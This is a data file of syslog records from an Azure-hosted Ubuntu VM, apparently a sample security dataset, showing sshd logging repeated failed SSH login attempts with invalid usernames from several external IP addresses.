+17505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:18,UbuntuDevEnv,2019-06-26 09:10:18,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 58248:11: Bye Bye [preauth],66508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,58248,,
+17506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:43,UbuntuDevEnv,2019-06-26 09:10:42,auth,UbuntuDevEnv,info,Invalid user rust from 45.55.190.46 port 59866,66528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rust,45.55.190.4,59866,,
+17507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:43,UbuntuDevEnv,2019-06-26 09:10:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,66528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+17508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:43,UbuntuDevEnv,2019-06-26 09:10:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:45,UbuntuDevEnv,2019-06-26 09:10:45,auth,UbuntuDevEnv,info,Failed password for invalid user rust from 45.55.190.46 port 59866 ssh2,66528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rust,45.55.190.4,59866,,
+17510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:45,UbuntuDevEnv,2019-06-26 09:10:45,auth,UbuntuDevEnv,info,Disconnected from invalid user rust 45.55.190.46 port 59866 [preauth],66528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rust,45.55.190.4,59866,,
+17511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:10:45,UbuntuDevEnv,2019-06-26 09:10:45,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 59866:11: Bye Bye [preauth],66528,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,59866,,
+17512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:17,UbuntuDevEnv,2019-06-26 09:11:16,auth,UbuntuDevEnv,info,Invalid user demo from 143.0.52.117 port 45224,66724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,143.0.52.1,45224,,
+17513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:17,UbuntuDevEnv,2019-06-26 09:11:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,66724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:17,UbuntuDevEnv,2019-06-26 09:11:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:19,UbuntuDevEnv,2019-06-26 09:11:18,auth,UbuntuDevEnv,info,Failed password for invalid user demo from 143.0.52.117 port 45224 ssh2,66724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,143.0.52.1,45224,,
+17516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:19,UbuntuDevEnv,2019-06-26 09:11:19,auth,UbuntuDevEnv,info,Disconnected from invalid user demo 143.0.52.117 port 45224 [preauth],66724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,143.0.52.1,45224,,
+17517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:19,UbuntuDevEnv,2019-06-26 09:11:19,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 45224:11: Bye Bye [preauth],66724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,45224,,
+17518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:28,UbuntuDevEnv,2019-06-26 09:11:28,auth,UbuntuDevEnv,info,Invalid user pedro from 176.31.43.255 port 43032,66768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pedro,176.31.43.2,43032,,
+17519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:28,UbuntuDevEnv,2019-06-26 09:11:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:28,UbuntuDevEnv,2019-06-26 09:11:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,66768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:30,UbuntuDevEnv,2019-06-26 09:11:29,auth,UbuntuDevEnv,info,Invalid user csgoserver from 187.6.249.142 port 43282,66772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,187.6.249.1,43282,,
+17522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:30,UbuntuDevEnv,2019-06-26 09:11:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,66772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:30,UbuntuDevEnv,2019-06-26 09:11:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:30,UbuntuDevEnv,2019-06-26 09:11:30,auth,UbuntuDevEnv,info,Failed password for invalid user pedro from 176.31.43.255 port 43032 ssh2,66768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pedro,176.31.43.2,43032,,
+17525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:30,UbuntuDevEnv,2019-06-26 09:11:30,auth,UbuntuDevEnv,info,Disconnected from invalid user pedro 176.31.43.255 port 43032 [preauth],66768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pedro,176.31.43.2,43032,,
+17526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:30,UbuntuDevEnv,2019-06-26 09:11:30,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 43032:11: Bye Bye [preauth],66768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,43032,,
+17527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:32,UbuntuDevEnv,2019-06-26 09:11:32,auth,UbuntuDevEnv,info,Failed password for invalid user csgoserver from 187.6.249.142 port 43282 ssh2,66772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,187.6.249.1,43282,,
+17528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:32,UbuntuDevEnv,2019-06-26 09:11:32,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 43282:11: Bye Bye [preauth],66772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,43282,,
+17529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:32,UbuntuDevEnv,2019-06-26 09:11:32,auth,UbuntuDevEnv,info,Disconnected from invalid user csgoserver 187.6.249.142 port 43282 [preauth],66772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,187.6.249.1,43282,,
+17530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:38,UbuntuDevEnv,2019-06-26 09:11:38,auth,UbuntuDevEnv,info,Invalid user graham from 165.22.203.187 port 51670,66814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,graham,165.22.203.1,51670,,
+17531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:38,UbuntuDevEnv,2019-06-26 09:11:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:38,UbuntuDevEnv,2019-06-26 09:11:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,66814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:39,UbuntuDevEnv,2019-06-26 09:11:38,auth,UbuntuDevEnv,info,Invalid user graham from 176.31.202.90 port 59680,66817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,graham,176.31.202.9,59680,,
+17534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:39,UbuntuDevEnv,2019-06-26 09:11:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,66817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:39,UbuntuDevEnv,2019-06-26 09:11:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:40,UbuntuDevEnv,2019-06-26 09:11:39,auth,UbuntuDevEnv,info,Failed password for invalid user graham from 165.22.203.187 port 51670 ssh2,66814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,graham,165.22.203.1,51670,,
+17537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:40,UbuntuDevEnv,2019-06-26 09:11:39,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 51670:11: Bye Bye [preauth],66814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,51670,,
+17538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:40,UbuntuDevEnv,2019-06-26 09:11:39,auth,UbuntuDevEnv,info,Disconnected from invalid user graham 165.22.203.187 port 51670 [preauth],66814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,graham,165.22.203.1,51670,,
+17539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:40,UbuntuDevEnv,2019-06-26 09:11:40,auth,UbuntuDevEnv,info,Failed password for invalid user graham from 176.31.202.90 port 59680 ssh2,66817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,graham,176.31.202.9,59680,,
+17540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:40,UbuntuDevEnv,2019-06-26 09:11:40,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 59680:11: Bye Bye [preauth],66817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,59680,,
+17541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:40,UbuntuDevEnv,2019-06-26 09:11:40,auth,UbuntuDevEnv,info,Disconnected from invalid user graham 176.31.202.90 port 59680 [preauth],66817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,graham,176.31.202.9,59680,,
+17542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:50,UbuntuDevEnv,2019-06-26 09:11:49,auth,UbuntuDevEnv,info,Invalid user test5 from 115.159.216.187 port 32831,66837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test5,115.159.216.1,32831,,
+17543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:50,UbuntuDevEnv,2019-06-26 09:11:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:50,UbuntuDevEnv,2019-06-26 09:11:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,66837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+17545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:52,UbuntuDevEnv,2019-06-26 09:11:52,auth,UbuntuDevEnv,info,Failed password for invalid user test5 from 115.159.216.187 port 32831 ssh2,66837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test5,115.159.216.1,32831,,
+17546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:53,UbuntuDevEnv,2019-06-26 09:11:52,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 32831:11: Bye Bye [preauth],66837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,32831,,
+17547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:11:53,UbuntuDevEnv,2019-06-26 09:11:52,auth,UbuntuDevEnv,info,Disconnected from invalid user test5 115.159.216.187 port 32831 [preauth],66837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test5,115.159.216.1,32831,,
+17548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:45,UbuntuDevEnv,2019-06-26 09:12:45,auth,UbuntuDevEnv,info,Invalid user user from 176.31.43.255 port 48906,67052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,176.31.43.2,48906,,
+17549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:45,UbuntuDevEnv,2019-06-26 09:12:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:45,UbuntuDevEnv,2019-06-26 09:12:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,67052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:47,UbuntuDevEnv,2019-06-26 09:12:46,auth,UbuntuDevEnv,info,Failed password for invalid user user from 176.31.43.255 port 48906 ssh2,67052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,176.31.43.2,48906,,
+17552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:47,UbuntuDevEnv,2019-06-26 09:12:46,auth,UbuntuDevEnv,info,Disconnected from invalid user user 176.31.43.255 port 48906 [preauth],67052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,176.31.43.2,48906,,
+17553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:47,UbuntuDevEnv,2019-06-26 09:12:46,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 48906:11: Bye Bye [preauth],67052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,48906,,
+17554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:57,UbuntuDevEnv,2019-06-26 09:12:56,auth,UbuntuDevEnv,info,Invalid user vweru from 165.22.203.187 port 44854,67093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,165.22.203.1,44854,,
+17555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:57,UbuntuDevEnv,2019-06-26 09:12:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:57,UbuntuDevEnv,2019-06-26 09:12:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,67093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:58,UbuntuDevEnv,2019-06-26 09:12:57,auth,UbuntuDevEnv,info,Failed password for invalid user vweru from 165.22.203.187 port 44854 ssh2,67093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,165.22.203.1,44854,,
+17558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:58,UbuntuDevEnv,2019-06-26 09:12:57,auth,UbuntuDevEnv,info,Disconnected from invalid user vweru 165.22.203.187 port 44854 [preauth],67093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,165.22.203.1,44854,,
+17559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:12:58,UbuntuDevEnv,2019-06-26 09:12:57,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 44854:11: Bye Bye [preauth],67093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,44854,,
+17560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:03,UbuntuDevEnv,2019-06-26 09:13:02,auth,UbuntuDevEnv,info,Invalid user vn from 176.31.202.90 port 48254,67114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vn,176.31.202.9,48254,,
+17561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:03,UbuntuDevEnv,2019-06-26 09:13:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:03,UbuntuDevEnv,2019-06-26 09:13:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,67114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:05,UbuntuDevEnv,2019-06-26 09:13:04,auth,UbuntuDevEnv,info,Failed password for invalid user vn from 176.31.202.90 port 48254 ssh2,67114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vn,176.31.202.9,48254,,
+17564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:05,UbuntuDevEnv,2019-06-26 09:13:04,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 48254:11: Bye Bye [preauth],67114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,48254,,
